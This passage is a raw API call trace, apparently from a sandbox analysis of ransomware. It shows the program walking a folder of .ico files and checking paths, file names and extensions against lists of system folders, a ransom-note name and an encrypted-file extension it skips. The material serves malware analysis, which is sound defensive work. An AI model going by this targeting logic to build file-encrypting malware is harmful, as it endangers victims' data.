psz1="C:\\588bce7c90097ed212\\", psz2="Graphics", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.522] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\system32\\") returned 0x0 [0117.522] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\syswow64\\") returned 0x0 [0117.522] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\system\\") returned 0x0 [0117.522] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\winsxs\\") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\appdata\\roaming\\") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\appdata\\local\\") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\appdata\\locallow\\") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\all users\\microsoft\\") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\inetpub\\logs\\") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\boot\\") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\perflogs\\") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\programdata\\") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\drivers\\") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\wsus\\") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\efstmpwp\\") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\$recycle.bin\\") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="crypt_detect") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="cryptolocker") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="ransomware") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="C:\\WINDOWS") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="C:\\Program Files (x86)") returned 0x0 [0117.523] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="C:\\Program Files") returned 0x0 [0117.523] GetProcessHeap () returned 0xe30000 [0117.523] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4be) returned 0x68410a0 [0117.523] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.523] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\*", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\*") returned="C:\\588bce7c90097ed212\\Graphics\\*" [0117.558] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x730e91, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1cf0 [0117.559] StrCmpW (psz1=".", psz2=".") returned 0 [0117.559] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0117.559] StrCmpW (psz1="..", psz2=".") returned 1 [0117.559] StrCmpW (psz1="..", psz2="..") returned 0 [0117.559] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0117.559] StrCmpW (psz1="Print.ico", psz2=".") returned 1 [0117.559] StrCmpW (psz1="Print.ico", psz2="..") returned 1 [0117.559] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.559] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.559] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Print.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Print.ico" [0117.559] PathFindExtensionW (pszPath="Print.ico") returned=".ico" [0117.559] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.559] StrCmpIW (psz1="Print.ico", psz2="bootsect.bak") returned 1 [0117.559] StrCmpIW (psz1="Print.ico", psz2="iconcache.db") returned 1 [0117.559] StrCmpIW (psz1="Print.ico", psz2="thumbs.db") returned -1 [0117.559] StrCmpIW (psz1="Print.ico", psz2=" ransomware ") returned 1 [0117.559] StrCmpIW (psz1="Print.ico", psz2=" ransom ") returned 1 [0117.559] StrCmpIW (psz1="Print.ico", psz2="debug.txt") returned 1 [0117.559] StrCmpIW (psz1="Print.ico", psz2="boot.ini") returned 1 [0117.559] StrCmpIW (psz1="Print.ico", psz2="desktop.ini") returned 1 [0117.559] StrCmpIW (psz1="Print.ico", psz2="autorun.inf") returned 1 [0117.559] StrCmpIW (psz1="Print.ico", psz2="ntuser.dat") returned 1 [0117.559] StrCmpIW (psz1="Print.ico", psz2="ntldr") returned 1 [0117.559] StrCmpIW (psz1="Print.ico", psz2="ntdetect.com") returned 1 [0117.559] StrCmpIW (psz1="Print.ico", psz2="bootfont.bin") returned 1 [0117.559] StrCmpIW (psz1="Print.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.559] PathFindExtensionW (pszPath="Print.ico") returned=".ico" [0117.559] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.559] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0117.559] StrCmpW (psz1="Rotate1.ico", psz2=".") returned 1 [0117.559] StrCmpW (psz1="Rotate1.ico", psz2="..") returned 1 [0117.559] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.560] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.560] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate1.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" [0117.560] PathFindExtensionW (pszPath="Rotate1.ico") returned=".ico" [0117.560] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2="bootsect.bak") returned 1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2="iconcache.db") returned 1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2="thumbs.db") returned -1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2=" ransomware ") returned 1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2=" ransom ") returned 1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2="debug.txt") returned 1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2="boot.ini") returned 1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2="desktop.ini") returned 1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2="autorun.inf") returned 1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2="ntuser.dat") returned 1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2="ntldr") returned 1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2="ntdetect.com") returned 1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2="bootfont.bin") returned 1 [0117.560] StrCmpIW (psz1="Rotate1.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.560] PathFindExtensionW (pszPath="Rotate1.ico") returned=".ico" [0117.560] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.561] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0117.561] StrCmpW (psz1="Rotate2.ico", psz2=".") returned 1 [0117.561] StrCmpW (psz1="Rotate2.ico", psz2="..") returned 1 [0117.561] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.561] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.561] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate2.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" [0117.561] PathFindExtensionW (pszPath="Rotate2.ico") returned=".ico" [0117.561] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2="bootsect.bak") returned 1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2="iconcache.db") returned 1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2="thumbs.db") returned -1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2=" ransomware ") returned 1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2=" ransom ") returned 1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2="debug.txt") returned 1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2="boot.ini") returned 1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2="desktop.ini") returned 1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2="autorun.inf") returned 1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2="ntuser.dat") returned 1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2="ntldr") returned 1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2="ntdetect.com") returned 1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2="bootfont.bin") returned 1 [0117.561] StrCmpIW (psz1="Rotate2.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.561] PathFindExtensionW (pszPath="Rotate2.ico") returned=".ico" [0117.561] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.561] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0117.561] StrCmpW (psz1="Rotate3.ico", psz2=".") returned 1 [0117.561] StrCmpW (psz1="Rotate3.ico", psz2="..") returned 1 [0117.561] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.561] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.561] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate3.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" [0117.561] PathFindExtensionW (pszPath="Rotate3.ico") returned=".ico" [0117.561] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.561] StrCmpIW (psz1="Rotate3.ico", psz2="bootsect.bak") returned 1 [0117.561] StrCmpIW (psz1="Rotate3.ico", psz2="iconcache.db") returned 1 [0117.562] StrCmpIW (psz1="Rotate3.ico", psz2="thumbs.db") returned -1 [0117.562] StrCmpIW (psz1="Rotate3.ico", psz2=" ransomware ") returned 1 [0117.563] StrCmpIW (psz1="Rotate3.ico", psz2=" ransom ") returned 1 [0117.563] StrCmpIW (psz1="Rotate3.ico", psz2="debug.txt") returned 1 [0117.563] StrCmpIW (psz1="Rotate3.ico", psz2="boot.ini") returned 1 [0117.563] StrCmpIW (psz1="Rotate3.ico", psz2="desktop.ini") returned 1 [0117.564] StrCmpIW (psz1="Rotate3.ico", psz2="autorun.inf") returned 1 [0117.564] StrCmpIW (psz1="Rotate3.ico", psz2="ntuser.dat") returned 1 [0117.564] StrCmpIW (psz1="Rotate3.ico", psz2="ntldr") returned 1 [0117.564] StrCmpIW (psz1="Rotate3.ico", psz2="ntdetect.com") returned 1 [0117.564] StrCmpIW (psz1="Rotate3.ico", psz2="bootfont.bin") returned 1 [0117.564] StrCmpIW (psz1="Rotate3.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.564] PathFindExtensionW (pszPath="Rotate3.ico") returned=".ico" [0117.564] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.564] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0117.564] StrCmpW (psz1="Rotate4.ico", psz2=".") returned 1 [0117.564] StrCmpW (psz1="Rotate4.ico", psz2="..") returned 1 [0117.564] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.564] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.564] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate4.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" [0117.564] PathFindExtensionW (pszPath="Rotate4.ico") returned=".ico" [0117.564] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2="bootsect.bak") returned 1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2="iconcache.db") returned 1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2="thumbs.db") returned -1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2=" ransomware ") returned 1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2=" ransom ") returned 1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2="debug.txt") returned 1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2="boot.ini") returned 1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2="desktop.ini") returned 1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2="autorun.inf") returned 1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2="ntuser.dat") returned 1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2="ntldr") returned 1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2="ntdetect.com") returned 1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2="bootfont.bin") returned 1 [0117.564] StrCmpIW (psz1="Rotate4.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.564] PathFindExtensionW (pszPath="Rotate4.ico") returned=".ico" [0117.564] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.564] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0117.564] StrCmpW (psz1="Rotate5.ico", psz2=".") returned 1 [0117.564] StrCmpW (psz1="Rotate5.ico", psz2="..") returned 1 [0117.565] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.565] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.565] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate5.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" [0117.565] PathFindExtensionW (pszPath="Rotate5.ico") returned=".ico" [0117.565] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2="bootsect.bak") returned 1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2="iconcache.db") returned 1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2="thumbs.db") returned -1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2=" ransomware ") returned 1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2=" ransom ") returned 1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2="debug.txt") returned 1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2="boot.ini") returned 1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2="desktop.ini") returned 1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2="autorun.inf") returned 1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2="ntuser.dat") returned 1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2="ntldr") returned 1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2="ntdetect.com") returned 1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2="bootfont.bin") returned 1 [0117.565] StrCmpIW (psz1="Rotate5.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.565] PathFindExtensionW (pszPath="Rotate5.ico") returned=".ico" [0117.565] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.565] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0117.565] StrCmpW (psz1="Rotate6.ico", psz2=".") returned 1 [0117.565] StrCmpW (psz1="Rotate6.ico", psz2="..") returned 1 [0117.565] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0117.565] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0117.565] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate6.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" [0117.565] PathFindExtensionW (pszPath="Rotate6.ico") returned=".ico" [0117.565] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0117.565] StrCmpIW (psz1="Rotate6.ico", psz2="bootsect.bak") returned 1 [0117.565] StrCmpIW (psz1="Rotate6.ico", psz2="iconcache.db") returned 1 [0117.565] StrCmpIW (psz1="Rotate6.ico", psz2="thumbs.db") returned -1 [0117.565] StrCmpIW (psz1="Rotate6.ico", psz2=" ransomware ") returned 1 [0117.574] StrCmpIW (psz1="Rotate6.ico", psz2=" ransom ") returned 1 [0117.574] StrCmpIW (psz1="Rotate6.ico", psz2="debug.txt") returned 1 [0117.574] StrCmpIW (psz1="Rotate6.ico", psz2="boot.ini") returned 1 [0117.574] StrCmpIW (psz1="Rotate6.ico", psz2="desktop.ini") returned 1 [0117.574] StrCmpIW (psz1="Rotate6.ico", psz2="autorun.inf") returned 1 [0117.574] StrCmpIW (psz1="Rotate6.ico", psz2="ntuser.dat") returned 1 [0117.574] StrCmpIW (psz1="Rotate6.ico", psz2="ntldr") returned 1 [0117.574] StrCmpIW (psz1="Rotate6.ico", psz2="ntdetect.com") returned 1 [0117.574] StrCmpIW (psz1="Rotate6.ico", psz2="bootfont.bin") returned 1 [0117.574] StrCmpIW (psz1="Rotate6.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.574] PathFindExtensionW (pszPath="Rotate6.ico") returned=".ico" [0117.574] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.574] FindNextFileW (in: 